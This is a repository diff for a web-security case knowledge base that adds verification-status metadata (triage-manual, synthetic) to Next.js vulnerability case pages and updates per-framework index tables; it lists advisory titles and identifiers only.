| Open Redirect in Next.js | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-13T22:00:08.038285Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2021-37699.md) |
| Open Redirect in Next.js versions | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-13T22:14:13.665535Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2020-15242.md) |
| Directory Traversal in Next.js | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2025-09-26T17:49:56Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2020-5284.md) |

13
07-framework-security/frameworks/nextjs/cases/nextjs-cve-2020-15242.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-03-13T22:14:13.665535Z"
severity: "low"
exploit_status: "unknown"
source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types:
- "lab-local"
- "lab-public"
@@ -31,6 +35,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-x56p
# Open Redirect in Next.js versions
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层
- Canonical ID: `nextjs--CVE-2020-15242`

13
07-framework-security/frameworks/nextjs/cases/nextjs-cve-2020-5284.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2025-09-26T17:49:56Z"
severity: "low"
exploit_status: "unknown"
source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types:
- "lab-local"
- "lab-public"
@@ -32,6 +36,15 @@ primary_source: "https://github.com/zeit/next.js/security/advisories/GHSA-fq77-7
# Directory Traversal in Next.js
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层
- Canonical ID: `nextjs--CVE-2020-5284`

13
07-framework-security/frameworks/nextjs/cases/nextjs-cve-2021-37699.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-03-13T22:00:08.038285Z"
severity: "low"
exploit_status: "unknown"
source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types:
- "lab-local"
- "lab-public"
@@ -32,6 +36,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-vxf5
# Open Redirect in Next.js
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层
- Canonical ID: `nextjs--CVE-2021-37699`

13
07-framework-security/frameworks/nextjs/cases/nextjs-cve-2021-39178.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-03-13T22:00:20.154452Z"
severity: "low"
exploit_status: "unknown"
source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types:
- "lab-local"
- "lab-public"
@@ -32,6 +36,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-9gr3
# XSS in Image Optimization API for Next.js
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层
- Canonical ID: `nextjs--CVE-2021-39178`

13
07-framework-security/frameworks/nextjs/cases/nextjs-cve-2021-43803.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-03-13T22:00:36.554552Z"
severity: "low"
exploit_status: "unknown"
source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types:
- "lab-local"
- "lab-public"
@@ -34,6 +38,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-25mp
# Unexpected server crash in Next.js.
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层
- Canonical ID: `nextjs--CVE-2021-43803`

13
07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-34351.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-02-04T03:32:36.434669Z"
severity: "low"
exploit_status: "unknown"
source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types:
- "lab-local"
- "lab-public"
@@ -32,6 +36,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-fr5h
# Next.js Server-Side Request Forgery in Server Actions
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层
- Canonical ID: `nextjs--CVE-2024-34351`

13
07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-46982.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-02-04T03:45:33.402195Z"
severity: "low"
exploit_status: "unknown"
source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types:
- "lab-local"
- "lab-public"
@@ -33,6 +37,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-gp8f
# Next.js Cache Poisoning
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层
- Canonical ID: `nextjs--CVE-2024-46982`

13
07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-47831.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-02-04T03:25:43.295558Z"
severity: "low"
exploit_status: "unknown"
source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types:
- "lab-local"
- "lab-public"
@@ -31,6 +35,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-g77x
# Denial of Service condition in Next.js image optimization
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层
- Canonical ID: `nextjs--CVE-2024-47831`

13
07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-51479.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2025-09-10T21:12:24Z"
severity: "low"
exploit_status: "unknown"
source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types:
- "lab-local"
- "lab-public"
@@ -31,6 +35,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-7gfc
# Next.js authorization bypass vulnerability
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层
- Canonical ID: `nextjs--CVE-2024-51479`

13
07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-56332.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-02-04T04:36:04.252972Z"
severity: "low"
exploit_status: "unknown"
source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types:
- "lab-local"
- "lab-public"
@@ -35,6 +39,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-7m27
# Next.js Allows a Denial of Service (DoS) with Server Actions
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层
- Canonical ID: `nextjs--CVE-2024-56332`

13
07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-29927.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-03-04T15:06:29.993197Z"
severity: "low"
exploit_status: "unknown"
source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types:
- "lab-local"
- "lab-public"
@@ -37,6 +41,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-f82v
# Authorization Bypass in Next.js Middleware
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层
- Canonical ID: `nextjs--CVE-2025-29927`

13
07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-30218.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2025-10-13T15:35:50Z"
severity: "medium"
exploit_status: "unknown"
source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types:
- "lab-local"
- "lab-public"
@@ -41,6 +45,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-223j
# Next.js may leak x-middleware-subrequest-id to external hosts
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层
- Canonical ID: `nextjs--CVE-2025-30218`

13
07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-32421.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2025-09-26T17:48:29Z"
severity: "low"
exploit_status: "unknown"
source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types:
- "lab-local"
- "lab-public"
@@ -33,6 +37,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-qpjv
# Next.js Race Condition to Cache Poisoning
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层
- Canonical ID: `nextjs--CVE-2025-32421`

13
07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-48068.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2025-06-13T14:41:21Z"
severity: "medium"
exploit_status: "unknown"
source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types:
- "lab-local"
- "lab-public"
@@ -33,6 +37,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-3h52
# Information exposure in Next.js dev server due to lack of origin verification
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层
- Canonical ID: `nextjs--CVE-2025-48068`

13
07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-49005.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-02-04T02:37:18.974477Z"
severity: "low"
exploit_status: "unknown"
source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types:
- "lab-local"
- "lab-public"
@@ -31,6 +35,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-r2fc
# Next.js has a Cache poisoning vulnerability due to omission of the Vary header
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层
- Canonical ID: `nextjs--CVE-2025-49005`

13
07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-49826.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2025-07-03T21:49:52Z"
severity: "low"
exploit_status: "unknown"
source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types:
- "lab-local"
- "lab-public"
@@ -31,6 +35,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-67rr
# Next.JS vulnerability can lead to DoS via cache poisoning
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层
- Canonical ID: `nextjs--CVE-2025-49826`

13
07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-55173.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-02-04T04:35:34.538107Z"
severity: "low"
exploit_status: "unknown"
source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types:
- "lab-local"
- "lab-public"
@@ -33,6 +37,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-xv57
# Next.js Content Injection Vulnerability for Image Optimization
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层
- Canonical ID: `nextjs--CVE-2025-55173`

13
07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-57752.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-02-04T02:50:08.291668Z"
severity: "low"
exploit_status: "unknown"
source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types:
- "lab-local"
- "lab-public"
@@ -33,6 +37,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-g5qg
# Next.js Affected by Cache Key Confusion for Image Optimization API Routes
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层
- Canonical ID: `nextjs--CVE-2025-57752`

13
07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-57822.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-02-04T04:20:45.658010Z"
severity: "low"
exploit_status: "unknown"
source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types:
- "lab-local"
- "lab-public"
@@ -34,6 +38,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-4342
# Next.js Improper Middleware Redirect Handling Leads to SSRF
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层
- Canonical ID: `nextjs--CVE-2025-57822`

13
07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-59471.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-02-10T01:28:46.973023Z"
severity: "low"
exploit_status: "unknown"
source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types:
- "lab-local"
- "lab-public"
@@ -33,6 +37,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-9g9p
# Next.js self-hosted applications vulnerable to DoS via Image Optimizer remotePatterns configuration
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层
- Canonical ID: `nextjs--CVE-2025-59471`

13
07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-59472.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-02-06T13:13:43.709252Z"
severity: "low"
exploit_status: "unknown"
source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types:
- "lab-local"
- "lab-public"
@@ -33,6 +37,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-5f7q
# Next.js has Unbounded Memory Consumption via PPR Resume Endpoint
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层
- Canonical ID: `nextjs--CVE-2025-59472`

13
07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-5j59-xgg2-r9c4.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-02-04T02:46:38.768104Z"
severity: "low"
exploit_status: "unknown"
source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types:
- "lab-local"
- "lab-public"
@@ -48,6 +52,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-5j59
# Next has a Denial of Service with Server Components - Incomplete Fix Follow-Up
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层
- Canonical ID: `nextjs--GHSA-5j59-xgg2-r9c4`

13
07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-9qr9-h5gf-34mp.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-02-04T03:45:15.823345Z"
severity: "low"
exploit_status: "unknown"
source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types:
- "lab-local"
- "lab-public"
@@ -43,6 +47,15 @@ primary_source: "https://github.com/facebook/react/security/advisories/GHSA-fv66
# Next.js is vulnerable to RCE in React flight protocol
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层
- Canonical ID: `nextjs--GHSA-9qr9-h5gf-34mp`

13
07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-h25m-26qc-wcjf.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-02-13T00:43:52.836085Z"
severity: "low"
exploit_status: "unknown"
source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types:
- "lab-local"
- "lab-public"
@@ -48,6 +52,15 @@ primary_source: "https://github.com/facebook/react/security/advisories/GHSA-83fc
# Next.js HTTP request deserialization can lead to DoS when using insecure React Server Components
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层
- Canonical ID: `nextjs--GHSA-h25m-26qc-wcjf`

13
07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-mwv6-3258-q52c.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-02-04T03:55:54.855562Z"
severity: "low"
exploit_status: "unknown"
source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types:
- "lab-local"
- "lab-public"
@@ -49,6 +53,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-mwv6
# Next Vulnerable to Denial of Service with Server Components
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层
- Canonical ID: `nextjs--GHSA-mwv6-3258-q52c`

13
07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-w37m-7fhw-fmv9.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-02-04T02:51:40.627151Z"
severity: "low"
exploit_status: "unknown"
source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types:
- "lab-local"
- "lab-public"
@@ -47,6 +51,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-w37m
# Next Server Actions Source Code Exposure
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层
- Canonical ID: `nextjs--GHSA-w37m-7fhw-fmv9`

12
07-framework-security/frameworks/nodejs/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0`
- 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00`
- 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束
@@ -25,6 +29,6 @@
## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - |
| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/frameworks/nuxt/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0`
- 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00`
- 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束
@@ -26,6 +30,6 @@
## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - |
| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/frameworks/rails/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0`
- 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00`
- 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:46+00:00`
## 目标约束
@@ -25,6 +29,6 @@
## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - |
| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/frameworks/react/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0`
- 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00`
- 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束
@@ -26,6 +30,6 @@
## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - |
| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/frameworks/spring-boot/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0`
- 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00`
- 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:46+00:00`
## 目标约束
@@ -25,6 +29,6 @@
## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - |
| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/frameworks/spring-framework/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0`
- 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00`
- 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:46+00:00`
## 目标约束
@@ -25,6 +29,6 @@
## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - |
| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/frameworks/spring-security/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0`
- 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00`
- 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:46+00:00`
## 目标约束
@@ -25,6 +29,6 @@
## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - |
| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/frameworks/sveltekit/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0`
- 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00`
- 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束
@@ -25,6 +29,6 @@
## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - |
| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/frameworks/symfony/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0`
- 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00`
- 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:46+00:00`
## 目标约束
@@ -25,6 +29,6 @@
## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - |
| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

38
07-framework-security/frameworks/undici/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `14`
- 近 30 天新增/更新: `7`
- 重点 Markdown 案例数: `14`
- 最近渲染时间: `2026-03-17T04:37:52+00:00`
- 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `14`
- 最近渲染时间: `2026-03-17T06:28:46+00:00`
## 目标约束
@@ -25,19 +29,19 @@
## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------|
| Undici has Unbounded Memory Consumption in WebSocket permessage-deflate Decompression | `low` | `generated` | `official` | `2026-03-13T20:54:25.563997Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-1526.md) |
| Undici has Unhandled Exception in WebSocket Client Due to Invalid server_max_window_bits Validation | `low` | `generated` | `official` | `2026-03-13T20:54:26.149214Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-2229.md) |
